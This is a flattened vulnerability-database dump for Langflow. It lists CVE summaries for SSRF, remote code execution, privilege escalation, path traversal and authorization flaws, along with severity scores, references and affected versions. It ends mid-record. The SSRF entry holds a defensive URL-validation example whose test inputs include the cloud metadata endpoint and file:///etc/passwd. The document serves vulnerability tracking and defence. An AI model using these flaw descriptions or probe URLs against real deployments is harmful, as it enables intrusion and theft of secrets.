reference_url https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/blob/main/src/backend/base/langflow/interface/utils.py#L65
3
reference_url https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://rumbling-slice-eb0.notion.site/Remote-Redos-in-https-github-com-langflow-ai-langflow-067159ced0d5494e91b06071384969c4?pvs=4
4
reference_url https://vuldb.com/?ctiid.278659
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?ctiid.278659
5
reference_url https://vuldb.com/?id.278659
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?id.278659
6
reference_url https://vuldb.com/?submit.410043
reference_id
reference_type
scores
0
value 2.3
scoring_system cvssv2
scoring_elements AV:A/AC:M/Au:S/C:N/I:N/A:P
1
value 3.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
2
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
3
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-27T15:01:06Z/
url https://vuldb.com/?submit.410043
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9277
reference_id CVE-2024-9277
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9277
8
reference_url https://github.com/advisories/GHSA-355v-2rjx-fpx7
reference_id GHSA-355v-2rjx-fpx7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-355v-2rjx-fpx7
fixed_packages
aliases CVE-2024-9277, GHSA-355v-2rjx-fpx7
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9k4q-zwxf-euh1
5
url VCID-bb6r-1f6u-t7ed
vulnerability_id VCID-bb6r-1f6u-t7ed
summary
Langflow vulnerable to Server-Side Request Forgery
**Vulnerability Overview**


Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

**Vulnerable Code**

1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.
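An added example, not Langflow's code, of the destination check the overview says the API Request component lacked: resolve the URL's host, and refuse any address in a loopback, private, link-local (which covers 169.254.169.254), multicast, reserved or unspecified range, unwrapping IPv4-mapped IPv6 first so `[::ffff:10.0.0.1]` is judged as `10.0.0.1`. The resolver is injected and backed by a constructed table so the example runs offline; `httpx` is not involved.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _blocked(ip) -> bool:
    """True for loopback, RFC 1918, link-local (incl. the metadata address), multicast,
    reserved and unspecified addresses."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.1 must be judged as 10.0.0.1
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str, resolve) -> tuple:
    """Return (allowed, detail). `resolve(host)` yields the address strings for host.
    Every resolved address has to pass, not just the first one the client would try."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP in the URL, no lookup needed
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (ValueError, OSError):
            return False, f"cannot resolve {host!r}"
    if not addrs:
        return False, f"cannot resolve {host!r}"
    for ip in addrs:
        if _blocked(ip):
            return False, f"{ip} is in a blocked range"
    return True, str(addrs[0])


# Constructed resolver table standing in for DNS so the checks are deterministic.
FAKE_DNS = {
    "example.test": ["93.184.216.34"],
    "internal.test": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
    "rebind.test": ["93.184.216.34", "10.0.0.5"],  # one public and one private record
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/", "http://127.0.0.1:7860/api/v1/flows",
              "http://[::ffff:10.0.0.1]/", "file:///etc/passwd", "http://internal.test/admin",
              "http://rebind.test/", "https://example.test/data"):
        print(u, check_outbound_url(u, fake_resolve))
```

Two caveats a check like this does not cover on its own: the address validated here must be the one actually connected to (otherwise a second DNS answer at connect time reopens the hole), and redirects have to be re-validated per hop, since a permitted host can 302 to `http://169.254.169.254/`.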
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68477
reference_id
reference_type
scores
0
value 0.00027
scoring_system epss
scoring_elements 0.0811
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68477
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68477
reference_id CVE-2025-68477
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68477
3
reference_url https://github.com/advisories/GHSA-5993-7p27-66g5
reference_id GHSA-5993-7p27-66g5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5993-7p27-66g5
4
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5
reference_id GHSA-5993-7p27-66g5
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:37Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-5993-7p27-66g5
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2025-68477, GHSA-5993-7p27-66g5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bb6r-1f6u-t7ed
6
url VCID-ef87-295y-zbha
vulnerability_id VCID-ef87-295y-zbha
summary Langflow through 0.6.19 allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-37014
reference_id
reference_type
scores
0
value 0.0596
scoring_system epss
scoring_elements 0.90832
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-37014
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/issues/1973
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-12T14:47:28Z/
url https://github.com/langflow-ai/langflow/issues/1973
3
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-37014
reference_id CVE-2024-37014
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-37014
5
reference_url https://github.com/advisories/GHSA-qg33-x2c5-6p44
reference_id GHSA-qg33-x2c5-6p44
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qg33-x2c5-6p44
fixed_packages
0
url pkg:pypi/langflow@1.0.0a3
purl pkg:pypi/langflow@1.0.0a3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-9k4q-zwxf-euh1
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-ef87-295y-zbha
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-s17d-sfjq-z7eg
14
vulnerability VCID-sbea-kkfu-akgb
15
vulnerability VCID-u8mw-7znw-rfab
16
vulnerability VCID-v5pc-pdm9-97g8
17
vulnerability VCID-wv26-29b9-vqgg
18
vulnerability VCID-ypxh-x2hy-3uhb
19
vulnerability VCID-ysnc-jyxb-6qcy
20
vulnerability VCID-zqwj-45w7-7kft
21
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.0a3
1
url pkg:pypi/langflow@1.0.15
purl pkg:pypi/langflow@1.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-9k4q-zwxf-euh1
6
vulnerability VCID-bb6r-1f6u-t7ed
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-sbea-kkfu-akgb
14
vulnerability VCID-u8mw-7znw-rfab
15
vulnerability VCID-v5pc-pdm9-97g8
16
vulnerability VCID-wv26-29b9-vqgg
17
vulnerability VCID-ypxh-x2hy-3uhb
18
vulnerability VCID-ysnc-jyxb-6qcy
19
vulnerability VCID-zqwj-45w7-7kft
20
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.15
aliases CVE-2024-37014, GHSA-qg33-x2c5-6p44, PYSEC-2024-177
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ef87-295y-zbha
7
url VCID-fc5h-qc2t-xqc3
vulnerability_id VCID-fc5h-qc2t-xqc3
summary
Langflow Vulnerable to Privilege Escalation via CLI Superuser Creation (Post-RCE)
A privilege escalation vulnerability exists in Langflow containers where an authenticated user with RCE access can invoke the internal CLI command **langflow superuser** to create a new administrative user. This results in full superuser access, even if the user initially registered through the UI as a regular (non-admin) account.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-57760
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04413
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-57760
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url https://github.com/langflow-ai/langflow/commit/c188ec113c9ca46154ad01d0eded1754cc6bef97
3
reference_url https://github.com/langflow-ai/langflow/pull/9152
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/pull/9152
4
reference_url http://github.com/langflow-ai/langflow/pull/9152
reference_id 9152
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url http://github.com/langflow-ai/langflow/pull/9152
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-57760
reference_id CVE-2025-57760
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2025-57760
6
reference_url https://github.com/advisories/GHSA-4gv9-mp8m-592r
reference_id GHSA-4gv9-mp8m-592r
reference_type
scores
url https://github.com/advisories/GHSA-4gv9-mp8m-592r
7
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r
reference_id GHSA-4gv9-mp8m-592r
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-08-25T20:34:06Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-4gv9-mp8m-592r
fixed_packages
0
url pkg:pypi/langflow@1.5.1
purl pkg:pypi/langflow@1.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-ysnc-jyxb-6qcy
15
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.5.1
aliases CVE-2025-57760, GHSA-4gv9-mp8m-592r
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fc5h-qc2t-xqc3
8
url VCID-jt18-vv56-2fgx
vulnerability_id VCID-jt18-vv56-2fgx
summary
Langflow vulnerable to remote code execution
langflow <=1.0.18 is vulnerable to Remote Code Execution (RCE) because any component can provide code-execution functionality, and components run on the local machine rather than in a sandbox.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-48061
reference_id
reference_type
scores
0
value 0.132
scoring_system epss
scoring_elements 0.94274
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-48061
1
reference_url https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/
url https://gist.github.com/AfterSnows/1e58257867002462923fd62dde2b5d61
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://github.com/langflow-ai/langflow/issues/696
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/issues/696
4
reference_url https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-11-06T19:16:58Z/
url https://rumbling-slice-eb0.notion.site/There-is-a-Remote-Code-Execution-RCE-vulnerability-in-the-repository-https-github-com-langflow-a-105e3cda9e8c800fac92f1b571bd40d8
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-48061
reference_id CVE-2024-48061
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-48061
6
reference_url https://github.com/advisories/GHSA-5p5r-57fx-pmfr
reference_id GHSA-5p5r-57fx-pmfr
reference_type
scores
url https://github.com/advisories/GHSA-5p5r-57fx-pmfr
fixed_packages
0
url pkg:pypi/langflow@1.0.19
purl pkg:pypi/langflow@1.0.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-bb6r-1f6u-t7ed
6
vulnerability VCID-fc5h-qc2t-xqc3
7
vulnerability VCID-ncvf-vzqr-uydz
8
vulnerability VCID-q4r1-xjfk-7bg9
9
vulnerability VCID-qwtw-q92t-quhz
10
vulnerability VCID-rc54-gw71-gyau
11
vulnerability VCID-sbea-kkfu-akgb
12
vulnerability VCID-u8mw-7znw-rfab
13
vulnerability VCID-v5pc-pdm9-97g8
14
vulnerability VCID-wv26-29b9-vqgg
15
vulnerability VCID-ypxh-x2hy-3uhb
16
vulnerability VCID-ysnc-jyxb-6qcy
17
vulnerability VCID-zqwj-45w7-7kft
18
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.19
aliases CVE-2024-48061, GHSA-5p5r-57fx-pmfr
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jt18-vv56-2fgx
9
url VCID-ncvf-vzqr-uydz
vulnerability_id VCID-ncvf-vzqr-uydz
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.1, in the download_profile_picture function of the /profile_pictures/{folder_name}/{file_name} endpoint, the folder_name and file_name parameters are not strictly filtered, which allows the secret_key to be read across directories. Version 1.7.1 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33497
reference_id
reference_type
scores
0
value 0.0005
scoring_system epss
scoring_elements 0.15912
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33497
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:45:18Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-ph9w-r52h-28p7
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33497
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33497
4
reference_url https://github.com/advisories/GHSA-ph9w-r52h-28p7
reference_id GHSA-ph9w-r52h-28p7
reference_type
scores
url https://github.com/advisories/GHSA-ph9w-r52h-28p7
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2026-33497, GHSA-ph9w-r52h-28p7, PYSEC-2026-81
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ncvf-vzqr-uydz
10
url VCID-q4r1-xjfk-7bg9
vulnerability_id VCID-q4r1-xjfk-7bg9
summary Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the delete_api_key_route() endpoint accepts an api_key_id path parameter and deletes it with only a generic authentication check (get_current_active_user dependency). However, the delete_api_key() CRUD function does NOT verify that the API key belongs to the current user before deletion.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33053
reference_id
reference_type
scores
0
value 0.00057
scoring_system epss
scoring_elements 0.18188
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33053
1
